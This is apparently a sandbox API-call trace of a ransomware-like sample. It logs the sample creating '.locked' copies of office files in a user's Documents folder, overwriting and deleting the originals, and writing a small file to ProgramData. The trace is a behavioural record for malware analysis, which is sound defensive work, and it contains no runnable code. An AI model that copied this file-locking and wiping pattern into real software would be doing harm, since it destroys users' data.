"c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\7g-3nq2zvxe4vik.png")) returned 1 [0290.590] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0293.048] SetEvent (hEvent=0x134) returned 1 [0293.048] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0293.094] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0293.171] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\P-STq-jQ5hYtJhIu5S.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\p-stq-jq5hytjhiu5s.ots")) returned 1 [0293.250] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.125] SetEvent (hEvent=0x1dc) returned 1 [0295.126] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.209] WriteFile (in: hFile=0x19c, lpBuffer=0x12670080*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x124a0e64, lpOverlapped=0x0 | out: lpBuffer=0x12670080*, lpNumberOfBytesWritten=0x124a0e64*=0x3a, lpOverlapped=0x0) returned 1 [0295.209] CloseHandle (hObject=0x19c) returned 1 [0295.211] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ej4CnCJUCwn5 nF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ej4cncjucwn5 nf.docx")) returned 1 [0295.376] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.553] SetEvent (hEvent=0x1b8) returned 1 [0295.553] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.592] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.630] SetEvent (hEvent=0x14c) returned 1 [0295.630] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.712] SetEvent (hEvent=0x22c) returned 1 [0295.712] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.720] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.785] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0295.825] SetEvent (hEvent=0x20c) returned 1 [0295.825] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*", lpFindFileData=0x1261fac8 | out: lpFindFileData=0x1261fac8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0295.932] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.330] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.376] SetEvent (hEvent=0x14c) returned 1 [0297.376] SetEvent (hEvent=0x134) returned 1 [0297.376] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.488] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.623] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0297.684] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.684] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0297.684] SetEvent (hEvent=0x150) returned 1 [0297.684] SetEvent (hEvent=0x22c) returned 1 [0297.684] SetEvent (hEvent=0x1dc) returned 1 [0297.684] SetEvent (hEvent=0x20c) returned 1 [0297.690] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0297.970] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.970] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0297.992] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0297.992] SetEvent (hEvent=0x20c) returned 1 [0297.992] SetEvent (hEvent=0x22c) returned 1 [0297.992] SetEvent (hEvent=0x104) returned 1 [0297.992] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0298.077] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0298.077] SetEvent (hEvent=0x104) returned 1 [0298.078] SetEvent (hEvent=0x22c) returned 1 [0298.078] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\5yfr.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5yfr.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0298.931] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0298.931] WriteFile (in: hFile=0x180, lpBuffer=0x12890000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x12890000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0299.111] CloseHandle (hObject=0x180) returned 1 [0299.260] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\5yfr.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5yfr.docx")) returned 1 [0299.821] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0299.911] SetEvent (hEvent=0x14c) returned 1 [0299.911] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0299.915] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\TP7qaB_8RwFo0zi2S F.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tp7qab_8rwfo0zi2s f.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0299.915] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0299.916] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\TP7qaB_8RwFo0zi2S F.ods.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tp7qab_8rwfo0zi2s f.ods.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0299.970] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.072] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0300.072] SetEvent (hEvent=0x1dc) returned 1 [0300.072] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.077] SetEvent (hEvent=0x198) returned 1 [0300.077] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.134] SetEvent (hEvent=0x21c) returned 1 [0300.134] SetEvent (hEvent=0x1dc) returned 1 [0300.134] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.421] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0300.421] SetEvent (hEvent=0x134) returned 1 [0300.421] SetEvent (hEvent=0x22c) returned 1 [0300.421] SetEvent (hEvent=0x1b8) returned 1 [0300.424] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0300.430] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.430] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0300.432] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.432] SetEvent (hEvent=0x104) returned 1 [0300.432] SetEvent (hEvent=0x1b8) returned 1 [0300.432] SetEvent (hEvent=0x134) returned 1 [0300.432] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0300.439] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0300.439] SetEvent (hEvent=0x150) returned 1 [0300.439] SetEvent (hEvent=0x134) returned 1 [0300.439] SetEvent (hEvent=0x1b8) returned 1 [0300.440] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\00jJreyg.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\00jjreyg.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0300.446] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0301.205] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x123a3e88 | out: lpMode=0x123a3e88) returned 0 [0301.205] WriteFile (in: hFile=0x188, lpBuffer=0x181fa000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a3e78, lpOverlapped=0x0 | out: lpBuffer=0x181fa000*, lpNumberOfBytesWritten=0x123a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0301.482] CloseHandle (hObject=0x188) returned 1 [0301.524] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0301.533] SetEvent (hEvent=0x198) returned 1 [0301.533] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0301.535] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0302.085] SetEvent (hEvent=0x22c) returned 1 [0302.085] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0302.126] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0302.127] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0302.195] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0302.196] SetEvent (hEvent=0x22c) returned 1 [0302.196] SetEvent (hEvent=0x1dc) returned 1 [0302.196] SetEvent (hEvent=0x1f0) returned 1 [0302.196] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0302.199] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0302.199] SetEvent (hEvent=0x150) returned 1 [0302.199] SetEvent (hEvent=0x1f0) returned 1 [0302.199] SetEvent (hEvent=0x1dc) returned 1 [0302.228] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\UYS dfMqbVg.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uys dfmqbvg.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0302.230] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x124a3e88 | out: lpMode=0x124a3e88) returned 0 [0302.230] WriteFile (in: hFile=0x218, lpBuffer=0x1295a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a3e78, lpOverlapped=0x0 | out: lpBuffer=0x1295a000*, lpNumberOfBytesWritten=0x124a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0302.263] CloseHandle (hObject=0x218) returned 1 [0302.686] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0302.918] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\UYS dfMqbVg.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uys dfmqbvg.xlsx")) returned 1 [0303.060] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.757] SetEvent (hEvent=0x22c) returned 1 [0303.757] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.772] SetEvent (hEvent=0x104) returned 1 [0303.772] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.786] SetEvent (hEvent=0x1dc) returned 1 [0303.786] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.821] SetEvent (hEvent=0x20c) returned 1 [0303.821] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.829] SetEvent (hEvent=0x134) returned 1 [0303.829] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.837] SetEvent (hEvent=0x134) returned 1 [0303.837] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.849] SetEvent (hEvent=0x1f0) returned 1 [0303.849] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.872] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.873] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\VupTUE7Pb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vuptue7pb.xls")) returned 1 [0303.894] SetEvent (hEvent=0x1dc) returned 1 [0303.894] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.910] SetEvent (hEvent=0x190) returned 1 [0303.911] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0303.926] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.926] SetEvent (hEvent=0x104) returned 1 [0303.926] SetEvent (hEvent=0x20c) returned 1 [0303.926] SetEvent (hEvent=0x198) returned 1 [0303.926] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0303.930] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0303.930] SetEvent (hEvent=0x150) returned 1 [0303.930] SetEvent (hEvent=0x20c) returned 1 [0303.930] SetEvent (hEvent=0x198) returned 1 [0303.931] SetEvent (hEvent=0x104) returned 1 [0303.931] SetEvent (hEvent=0x184) returned 1 [0303.931] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.056] SetEvent (hEvent=0x198) returned 1 [0304.056] SetEvent (hEvent=0x190) returned 1 [0304.056] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.060] SetEvent (hEvent=0x198) returned 1 [0304.060] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.066] SetEvent (hEvent=0x198) returned 1 [0304.066] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.074] SetEvent (hEvent=0x1ac) returned 1 [0304.074] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.137] SetEvent (hEvent=0x190) returned 1 [0304.137] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.138] SetEvent (hEvent=0x1f0) returned 1 [0304.138] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.147] SetEvent (hEvent=0x198) returned 1 [0304.147] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.162] SetEvent (hEvent=0x1ac) returned 1 [0304.162] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.178] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.189] SetEvent (hEvent=0x1b8) returned 1 [0304.189] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.257] SetEvent (hEvent=0x198) returned 1 [0304.257] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.413] SetEvent (hEvent=0x214) returned 1 [0304.414] SetEvent (hEvent=0x1b8) returned 1 [0304.414] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.420] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.468] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x124c7a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x124c7a24*=0xb) returned 1 [0304.503] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\Vi-SNb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vi-snb.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0304.503] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x124c7d9c | out: lpMode=0x124c7d9c) returned 0 [0304.503] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\Vi-SNb.xls.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vi-snb.xls.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0304.661] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.731] SetEvent (hEvent=0x150) returned 1 [0304.731] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x124c7d9c | out: lpMode=0x124c7d9c) returned 0 [0304.731] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.772] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.773] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.806] SetEvent (hEvent=0x1dc) returned 1 [0304.806] SetEvent (hEvent=0x1ac) returned 1 [0304.806] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\aLqbOAns.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\alqboans.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0304.806] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1249cd9c | out: lpMode=0x1249cd9c) returned 0 [0304.806] SetEvent (hEvent=0x21c) returned 1 [0304.806] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0304.972] SetEvent (hEvent=0x1f0) returned 1 [0304.972] WriteFile (in: hFile=0x200, lpBuffer=0x12c72000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a2e78, lpOverlapped=0x0 | out: lpBuffer=0x12c72000*, lpNumberOfBytesWritten=0x124a2e78*=0xfa000, lpOverlapped=0x0) returned 1 [0304.995] CloseHandle (hObject=0x200) returned 1 [0305.024] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0305.636] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\O4XyZ4ZdDUL8nyTp.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\o4xyz4zddul8nytp.csv")) returned 1 [0305.791] SetEvent (hEvent=0x1e8) returned 1 [0305.791] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0305.797] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0305.797] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0305.811] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0305.811] SetEvent (hEvent=0x1ac) returned 1 [0305.811] SetEvent (hEvent=0x134) returned 1 [0305.811] SetEvent (hEvent=0x1e8) returned 1 [0305.812] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0305.814] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0305.814] SetEvent (hEvent=0x150) returned 1 [0305.814] SetEvent (hEvent=0x134) returned 1 [0305.814] SetEvent (hEvent=0x1e8) returned 1 [0305.814] SetEvent (hEvent=0x1ac) returned 1 [0305.814] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0305.820] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.054] SetEvent (hEvent=0x134) returned 1 [0306.054] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.059] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12667a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12667a24*=0xb) returned 1 [0306.065] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.237] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.254] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.369] SetEvent (hEvent=0x1e8) returned 1 [0306.369] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.383] SetEvent (hEvent=0x21c) returned 1 [0306.383] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.391] ReadFile (in: hFile=0x1c8, lpBuffer=0x13f56000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x124a3d68, lpOverlapped=0x0 | out: lpBuffer=0x13f56000*, lpNumberOfBytesRead=0x124a3d68*=0x7b31, lpOverlapped=0x0) returned 1 [0306.393] WriteFile (in: hFile=0x208, lpBuffer=0x13f56000*, nNumberOfBytesToWrite=0x7b31, lpNumberOfBytesWritten=0x124a3d74, lpOverlapped=0x0 | out: lpBuffer=0x13f56000*, lpNumberOfBytesWritten=0x124a3d74*=0x7b31, lpOverlapped=0x0) returned 1 [0306.397] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0306.526] ReadFile (in: hFile=0x1c8, lpBuffer=0x13f56000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x124a3d68, lpOverlapped=0x0 | out: lpBuffer=0x13f56000*, lpNumberOfBytesRead=0x124a3d68*=0x0, lpOverlapped=0x0) returned 1 [0306.526] CloseHandle (hObject=0x208) returned 1 [0306.604] CloseHandle (hObject=0x1c8) returned 1 [0306.604] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0306.605] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x124a3e94 | out: lpMode=0x124a3e94) returned 0 [0306.605] WriteFile (in: hFile=0x1c8, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x124a3e64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x124a3e64*=0x3e, lpOverlapped=0x0) returned 1 [0306.605] CloseHandle (hObject=0x1c8) returned 1 [0306.607] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\ohmbGEEdwmqzwO.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ohmbgeedwmqzwo.xlsx")) returned 1 [0306.929] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\ohmbGEEdwmqzwO.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ohmbgeedwmqzwo.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0307.090] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x124a3e88 | out: lpMode=0x124a3e88) returned 0 [0307.091] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0307.094] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0307.109] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.109] SetEvent (hEvent=0x20c) returned 1 [0307.109] SetEvent (hEvent=0x21c) returned 1 [0307.109] SetEvent (hEvent=0x1f0) returned 1 [0307.109] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.111] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0307.111] SetEvent (hEvent=0x1f0) returned 1 [0307.111] WriteFile (in: hFile=0x19c, lpBuffer=0x13356000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a1e78, lpOverlapped=0x0 | out: lpBuffer=0x13356000*, lpNumberOfBytesWritten=0x123a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0307.142] CloseHandle (hObject=0x19c) returned 1 [0307.172] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\ohmbGEEdwmqzwO.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ohmbgeedwmqzwo.xlsx")) returned 1 [0307.194] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0307.201] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.303] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.305] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.310] SetEvent (hEvent=0x20c) returned 1 [0307.310] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 